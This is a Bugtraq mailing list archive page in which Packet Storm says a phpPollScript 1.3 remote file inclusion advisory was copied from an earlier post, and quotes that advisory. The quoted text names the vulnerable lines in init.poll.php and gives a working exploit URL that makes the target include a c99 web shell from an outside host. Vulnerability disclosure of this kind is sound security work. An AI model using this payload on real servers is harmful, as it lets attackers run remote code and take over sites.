Bugtraq mailing list archives

Re: phpPollScript - 1.3 Remote File Include

From: Packet Storm <bugtraq () packetstormsecurity org>
Date: Mon, 21 Dec 2009 18:57:26 -0500

stolen/copied.

http://packetstormsecurity.org/0909-exploits/phppollscript-rfi.txt 67daecae41e8707794f089bf6128efd0 phpPollScript 
versions 1.3 and below suffer from a remote file inclusion vulnerability. Authored By <a 
href="mailto:cr4wl3r[at]linuxmail.org";>cr4wl3r</a>


On Sun, Dec 20, 2009 at 11:43:25AM -0000, admin () ekin0x com wrote:

#phpPollScript <= 1.3 Remote File Include Vulnerability
#Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip
#Author               :  ZZxxHackerzzXX 
#Contact              :  admin () ekin0x com
#Location             :  Turkey
########################################################################
#file :
#  init.poll.php
# line 2 $inc_path = dirname($include_class);
# line 3 require ($inc_path."/voting.poll.php");
########################################################################
#3xplo!t :
#http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt?
########################################################################
#eser () ekin0x com (all crew shell)
########################################################################

Current thread:

phpPollScript - 1.3 Remote File Include admin (Dec 21)
- Re: phpPollScript - 1.3 Remote File Include Packet Storm (Dec 22)